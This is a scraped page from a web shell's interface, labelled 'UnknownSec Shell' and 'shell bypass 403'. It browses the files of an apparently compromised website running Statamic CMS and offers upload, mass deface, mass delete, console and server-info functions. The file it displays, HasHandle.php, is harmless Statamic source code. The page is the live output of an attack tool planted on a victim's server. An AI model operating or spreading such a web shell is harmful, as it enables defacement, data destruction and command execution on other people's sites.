shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Extend
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
HasHandle.php
<?php namespace Statamic\Extend; use ReflectionClass; use Statamic\Support\Str; trait HasHandle { protected static $handle; public static function handle() { if (static::$handle) { return static::$handle; } $class = (new ReflectionClass(static::class))->getShortName(); return Str::snake($class); } }
© 2026 UnknownSec